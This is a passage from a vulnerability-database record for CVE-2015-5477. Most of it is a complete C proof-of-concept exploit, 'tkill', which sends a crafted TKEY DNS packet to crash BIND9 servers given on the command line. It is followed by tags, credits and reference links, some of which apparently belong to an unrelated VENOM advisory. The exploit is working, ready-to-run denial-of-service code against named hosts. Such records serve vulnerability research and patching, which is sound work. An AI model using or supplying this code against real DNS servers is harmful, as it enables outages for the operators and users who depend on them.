vendor: | ibm | model: | netezza host management | scope: | ne | version: | 5.3.8.0 | Trust: 0.3 |
vendor: | hp | model: | vcx | scope: | ne | version: | 9.8.18 | Trust: 0.3 |
vendor: | hp | model: | hp-ux c.9.7.3.8.0 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | ne | version: | x4.1.5 | Trust: 0.3 |
EXPLOIT
/*
PoC for BIND9 TKEY assert Dos (CVE-2015-5477)
Usage:
tkill <hostname>
What it does:
- First sends a "version" query to see if the server is up.
- Regardless of the version response, it then sends the DoS packet.
- Then it waits 5 seconds for a response. If the server crashes,
there will be no response.
Notes:
- multiple hostnames can be specified on the command-line
- IP addresses can be specified instead of hostnames
- supports IPv4 and IPv6
- runs on Linux, Mac, and Windows (cygwin or VisualStudio)
- if a hostname resolves to more than one IP, then all IPs
will be probed
About the vuln:
For control information, the "TSIG" feature allows packets to be
signed with a password. This allows slave servers to get updates
from master servers without a MitM attack (like from the NSA)
changing the data on the network.
A password can be distributed out of band, such as SSHing into
a box and editing the configuration file. Anther way is through
public-keys. That's the "TKEY" feature: it distributes new
TSIG passwords using public-keys.
When processing a TKEY packet, the code will call a function to
fetch the proper TKEY record. It looks in two places: the
"answer records" section, and the "additional records" section.
If it can't find it in the "additional", it looks in "answer".
The lookup function takes a parameter that is initially set
to NULL. During the failed lookup in the "additional" section,
it may set that parameter to a non-null value. Since a non-null
value is passed in again during the second lookup in the "answer"
section, the code crashes.
The patch was to set the variable to NULL before the second lookup.
The correct fix would simply not check to see if the parameter
was NULL to be begin with. It's an out-only parameter, so it's value
on input doesn't matter.
This is a just a "brainfart" bug that can only result in a crash
of the server. It cann't result in data-corruption or code
execution.
About this code:
To learn about writing network code, this is probably something useful
to study.
It works on both Windows and Unix (Linux, Mac, etc.). You can see where
the differences are between the two platforms, as well as the simularities.
It works on both IPv4 and IPv6. However, if you search through the code,
you'll find nothing that specifically references either version. It's
magically dual-stack. That's because it uses new functions like
"getaddrinfo()" instead of old functions like "gethostbyname()".
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#ifdef WIN32
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define WSA(err) (WSA##err)
#define WSAEAGAIN WSAETIMEDOUT
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#define WSAGetLastError() (errno)
#define WSA(err) (err)
#define closesocket(fd) close(fd)
#endif
/*
* DoS packet that will crash server
*/
static const unsigned char dospacket[] = {
0x01, 0x02, /* xid */
0x01, 0x00, /* query */
0x00, 0x01, /* one question */
0x00, 0x00, /* no answer */
0x00, 0x00, /* no authorities */
0x00, 0x01, /* one additional: must be 'additional' section to work*/
/* Query name */
0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,
0x00, 249, /* TKEY record type */
0x00, 255,
/* Additional record */
0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */
0x00, 16, /* record type: must NOT be 249/TKEY */
0x00, 255,
0, 0, 0, 0,
0, 51,
50,
'h', 't', 't', 'p', 's', ':', '/', '/',
'g', 'i', 't', 'h', 'u', 'b', '.', 'c',
'o', 'm', '/', 'r', 'o', 'b', 'e', 'r',
't', 'd', 'a', 'v', 'i', 'd', 'g', 'r',
'a', 'h', 'a', 'm', '/', 'c', 'v', 'e',
'-', '2', '0', '1', '5', '-', '5', '4',
'7', '7'
};
/*
* Packet for querying the version of the server, to test if it's up
*/
static const unsigned char versionpacket[] = {
0x03, 0x04, /* xid */
0x01, 0x00, /* query */
0x00, 0x01, /* one question */
0x00, 0x00, /* no answer */
0x00, 0x00, /* no authorities */
0x00, 0x00, /* no additional */
/* Query name */
0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,
0x00, 16, /* TXT */
0x00, 3, /* CHOAS */
};
/*
* YOLO BIND version.bind query
*/
int query_version(int fd, const struct addrinfo *target)
{
int bytes_received;
int i;
struct sockaddr_storage from;
socklen_t sizeof_from = sizeof(from);
char hostname[256];
unsigned char buf[2048];
int result = 0;
/*
* Query version
*/
sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0,
target->ai_addr, target->ai_addrlen);
/*
* get response
*/
again:
bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);
if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {
fprintf(stderr, "[-] timed out getting version, trying again\n");
return 0;
} else if (bytes_received <= 0) {
fprintf(stderr, "[-] unknown error receiving response: %u\n", WSAGetLastError());
return 0;
}
getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);
/*
* parse response
*/
if (bytes_received < 12)
goto again;
if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])
goto again;
if ((buf[2]&0x80) != 0x80)
goto again;
/*
* Handle respoonse code
*/
switch (buf[3]&0x0F) {
case 0:
/* parse packet below */
break;
case 1:
fprintf(stderr, "[-] %s: FORMERR\n", hostname);
return 1;
case 2:
fprintf(stderr, "[-] %s: SRVFAIL\n", hostname);
return 1;
case 3:
fprintf(stderr, "[-] %s: NAMERR\n", hostname);
return 1;
case 4:
fprintf(stderr, "[-] %s: NOTIMPL\n", hostname);
return 1;
case 5:
fprintf(stderr, "[-] %s: REFUSED\n", hostname);
return 1;
default:
fprintf(stderr, "[-] %s: unknown error: %u\n", hostname, buf[3]);
return 1;
}
i = 12; /* skip header */
/*
* skip query name
*/
while (i < bytes_received) {
if (buf[i] == 0) {
i++;
break;
} else if ((buf[i] & 0xC0) == 0xC0) {
i += 2;
break;
} else {
i += buf[i] + 1;
}
}
i += 4;
/*
* process all answers
*/
while (i + 12 <= bytes_received) {
int t, c, len;
/* skip answer name */
while (i < bytes_received) {
if (buf[i] == 0) {
i++;
break;
} else if ((buf[i] & 0xC0) == 0xC0) {
i += 2;
break;
} else {
i += buf[i] + 1;
}
}
/* extract resource-recorder header */
if (i + 10 > bytes_received)
break;
t = buf[i+0]<<8 | buf[i+1];
c = buf[i+2]<<8 | buf[i+3];
len = buf[i+8]<<8 | buf[i+9];
i += 10;
/* verify TXT CHAOS */
if (t != 16 || c != 3) {
i += len;
continue;
}
/* fix len */
if (len > bytes_received - i)
len = bytes_received - i;
/* print the hostname */
fprintf(stderr, "[+] %s: ", hostname);
/* print the strings */
{
int j = i;
i += len;
while (j < i) {
int len2 = buf[j];
int k;
j++;
if (len2 > bytes_received - len2)
len2 = bytes_received - len2;
fprintf(stderr, "\"");
for (k=j; k<j+len2; k++) {
if (buf[k] == '\\')
fprintf(stderr, "\\");
else if (!isprint(buf[k]))
fprintf(stderr, "\\x%02x", buf[k]);
else
fprintf(stderr, "%c", buf[k]);
}
j = k;
fprintf(stderr, "\" ");
}
fprintf(stderr, "\n");
}
result = 1;
}
return result;
}
/*
* Send the DoS packet
*/
void probe(const struct addrinfo *target)
{
int fd;
int x;
int i;
char hostname[256];
char buf[2048];
struct sockaddr_storage from;
socklen_t sizeof_from = sizeof(from);
/*
* Print status
*/
getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);
fprintf(stderr, "[+] %s: Probing...\n", hostname);
/*
* Create a socket
*/
fd = socket(target->ai_family, SOCK_DGRAM, 0);
if (fd <= 0) {
fprintf(stderr, "[-] failed: socket(): %u\n", WSAGetLastError());
return;
}
/*
* Set the timeout to 5-seconds
*/
{
#ifdef WIN32
int milliseconds = 5000;
x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));
#else
struct timeval t;
t.tv_sec = 5;
t.tv_usec = 0;
x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));
#endif
if (x != 0) {
fprintf(stderr, "[-] err setting recv timeout: %u\n", WSAGetLastError());
}
}
/*
* First, query the server to grab its version, but also to see it's up
*/
fprintf(stderr, "[+] Querying version...\n");
for (i=0; i<3; i++) {
if (query_version(fd, target))
break;
if (i == 2) {
fprintf(stderr, "[-] Can't query server, is it crashed already?\n");
fprintf(stderr, "[-] Sending exploit anyway.\n");
}
}
/*****************
* SEND DoS PACKET
*****************/
fprintf(stderr, "[+] Sending DoS packet...\n");
sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);
/* Grab response */
fprintf(stderr, "[+] Waiting 5-sec for response...\n");
for (;;) {
x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);
if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {
fprintf(stderr, "[+] timed out, probably crashed\n");
break;
} else if (x <= 0) {
fprintf(stderr, "[-] unknown error receiving response: %u\n", WSAGetLastError());
break;;
}
if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))
continue;
getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);
fprintf(stderr, "[-] %s: got response, so probably not vulnerable\n", hostname);
break;
}
closesocket(fd);
}
/*
* The main function just parses the arguments and looks up IP addrsses
* before calling the "probe" function to actually exploit the targets
*/
int main(int argc, char *argv[])
{
int i;
#ifdef WIN32
{WSADATA x; WSAStartup(0x101, &x);}
#endif
fprintf(stderr, "--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\n");
if (argc <= 1) {
fprintf(stderr, "[-] no host specified\n");
fprintf(stderr, "usage:\n tkill <hostname>\n");
return -1;
}
/*
* Query all targets specified on the command line
*/
for (i=1; i<argc; i++) {
const char *hostname = argv[i];
struct addrinfo *info;
struct addrinfo *target;
char oldtarget[256] = "";
int x;
/*
* Lookup the name of the target
*/
fprintf(stderr, "[+] %s: Resolving to IP address\n", hostname);
x = getaddrinfo(hostname, "53", 0, &info);
if (x != 0) {
fprintf(stderr, "[-] %s: failed: %s\n", hostname, gai_strerror(x));
continue;
}
if (info->ai_next) {
fprintf(stderr, "[+] %s: Resolved to multiple IPs (NOTE)\n", hostname);
}
/*
* Since a name can return multiple IP addresses,
* send a probe to all the results
*/
for (target=info; target; target = target->ai_next) {
char newtarget[256];
/* bah, stupid bug in Linux gets the same target multiple
* times */
getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);
if (strcmp(newtarget, oldtarget) == 0)
continue;
memcpy(oldtarget, newtarget, sizeof(oldtarget));
probe(target);
printf("\n");
}
/*
* Cleanup
*/
freeaddrinfo(info);
}
return 0;
}
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
TKEY (PoC)
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
CREDITS
Errata Security
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2015-5477 | Trust: 4.8 |
db: | EXPLOIT-DB | id: | 37721 | Trust: 1.6 |
db: | ISC | id: | AA-01272 | Trust: 1.1 |
db: | JUNIPER | id: | JSA10783 | Trust: 0.6 |
db: | EDBNET | id: | 58904 | Trust: 0.6 |
db: | EDBNET | id: | 81117 | Trust: 0.6 |
db: | EDBNET | id: | 81124 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 23948 | Trust: 0.6 |
db: | EDBNET | id: | 23565 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 23960 | Trust: 0.6 |
db: | EDBNET | id: | 23577 | Trust: 0.6 |
db: | PACKETSTORM | id: | 132926 | Trust: 0.5 |
db: | NVD | id: | CVE-2015-3456 | Trust: 0.3 |
db: | BID | id: | 74640 | Trust: 0.3 |
db: | JUNIPER | id: | JSA10718 | Trust: 0.3 |
db: | BID | id: | 76092 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2015-5477 | Trust: 3.3 |
url: | https://www.intelligentexploit.com | Trust: 1.2 |
url: | https://github.com/robertdavidgraham/cve-2015-5477/blob/34137c71a7fb4e3fa894b045583e67d7b46d62cc/tkill.c | Trust: 1.0 |
url: | https://kb.juniper.net/infocenter/index?page=content&id=jsa10783&cat=sirt_1&actp=list | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/37721/ | Trust: 0.6 |
url: | https://0day.today/exploits/23948 | Trust: 0.6 |
url: | https://0day.today/exploits/23960 | Trust: 0.6 |
url: | https://rhn.redhat.com/errata/rhsa-2015-1011.html | Trust: 0.3 |
url: | https://www.suse.com/support/update/announcement/2015/suse-su-20150896-1.html | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2015-1001.html | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2015-0999.html | Trust: 0.3 |
url: | https://www.suse.com/support/kb/doc.php?id=7016497 | Trust: 0.3 |
url: | https://www.suse.com/support/update/announcement/2015/suse-su-20150889-1.html | Trust: 0.3 |
url: | http://wiki.qemu.org/main_page | Trust: 0.3 |
url: | http://xenbits.xen.org/xsa/advisory-133.html | Trust: 0.3 |
url: | https://www.suse.com/support/update/announcement/2015/suse-su-20150944-1.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1022292 | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html | Trust: 0.3 |
url: | http://www.fortiguard.com/advisory/fg-ir-15-012/ | Trust: 0.3 |
url: | https://securityblog.redhat.com/2015/05/13/venom-dont-get-bitten/ | Trust: 0.3 |
url: | https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04706564 | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2015-1031.html | Trust: 0.3 |
url: | http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-438937.htm | Trust: 0.3 |
url: | https://help.joyent.com/entries/68099220-security-advisory-on-venom-cve-2015-3456-in-kvm-qemu | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2015-1004.html | Trust: 0.3 |
url: | https://www-304.ibm.com/connections/blogs/psirt/entry/venom_cve_2015_3456?lang=en_us | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2015-1000.html | Trust: 0.3 |
url: | http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-428704.htm | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2015/may/129 | Trust: 0.3 |
url: | https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098681 | Trust: 0.3 |
url: | http://support.citrix.com/article/ctx201078 | Trust: 0.3 |
url: | https://www.suse.com/support/update/announcement/2015/suse-su-20150889-2.html | Trust: 0.3 |
url: | http://git.qemu.org/?p=qemu.git;a=commit;h=e907746266721f305d67bc0718795fedee2e824c | Trust: 0.3 |
url: | https://www.suse.com/support/update/announcement/2015/suse-su-20150943-1.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21903743 | Trust: 0.3 |
url: | http://venom.crowdstrike.com/ | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2015/jul/135 | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2015-1513.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21966274 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas8n1020890 | Trust: 0.3 |
url: | http://seclists.org/oss-sec/2015/q3/233 | Trust: 0.3 |
url: | https://support.f5.com/kb/en-us/solutions/public/16000/900/sol16909.html | Trust: 0.3 |
url: | https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04789415 | Trust: 0.3 |
url: | https://support.apple.com/en-ie/ht205032 | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10718&actp=rss | Trust: 0.3 |
url: | https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04800156 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21964491 | Trust: 0.3 |
url: | https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774040 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21963712 | Trust: 0.3 |
url: | http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc | Trust: 0.3 |
url: | http://www.isc.org/products/bind/ | Trust: 0.3 |
url: | https://kb.netapp.com/support/index?page=content&id=9010056&actp=rss | Trust: 0.3 |
url: | https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04769567 | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html | Trust: 0.3 |
url: | https://www.us-cert.gov/ncas/current-activity/2015/09/16/internet-systems-consortium-isc-releases-security-updates-bind | Trust: 0.3 |
url: | https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04952480 | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 74640 |
db: | BID | id: | 76092 |
db: | PACKETSTORM | id: | 132926 |
db: | EXPLOIT-DB | id: | 37721 |
db: | EDBNET | id: | 58904 |
db: | EDBNET | id: | 81117 |
db: | EDBNET | id: | 81124 |
db: | EDBNET | id: | 23565 |
db: | EDBNET | id: | 23577 |
LAST UPDATE DATE
2022-07-27T09:11:51.619000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 74640 | date: | 2017-04-18T00:05:00 |
db: | BID | id: | 76092 | date: | 2017-04-18T01:05:00 |
SOURCES RELEASE DATE
db: | BID | id: | 74640 | date: | 2015-05-13T00:00:00 |
db: | BID | id: | 76092 | date: | 2015-07-28T00:00:00 |
db: | PACKETSTORM | id: | 132926 | date: | 2015-07-31T13:33:33 |
db: | EXPLOIT-DB | id: | 37721 | date: | 2015-08-01T00:00:00 |
db: | EDBNET | id: | 58904 | date: | 2015-08-01T00:00:00 |
db: | EDBNET | id: | 81117 | date: | 2015-08-01T00:00:00 |
db: | EDBNET | id: | 81124 | date: | 2015-08-01T00:00:00 |
db: | EDBNET | id: | 23565 | date: | 2015-08-01T00:00:00 |
db: | EDBNET | id: | 23577 | date: | 2015-08-04T00:00:00 |